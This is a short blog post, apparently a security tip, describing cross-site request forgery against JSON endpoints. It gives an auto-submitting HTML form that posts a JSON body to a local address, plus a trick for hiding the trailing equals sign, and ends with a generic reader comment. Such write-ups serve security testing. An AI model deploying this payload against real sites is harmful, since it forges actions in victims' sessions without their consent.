Sometimes you see a possible Cross-Site Request Forgery (CSRF) attack against JSON endpoints, where data is a JSON blob instead of x-www-form-urlencoded data.
Here is a PoC that will send a JSON CSRF.
<html> <form action="http://127.0.0.1/json" method="post" enctype="text/plain" name="jsoncsrf"> <input name='{"json":{"nested":"obj"},"list":["0","1"]}' type='hidden'> </form> <script> document.jsoncsrf.submit() </script> </html>
You can use any JSON including nested objects, lists, etc.
The previous example adds a trailing equal sign =, which will break some parsers. You can get around it with:
<input name='{"json":"data","extra' value='":"stuff"}' type='hidden'>
Which will give the following JSON:
{"json":"data","extra=":"stuff"}
Your blog has given me that thing which I never expect to get from all over the websites. Nice post guys!
ReplyDelete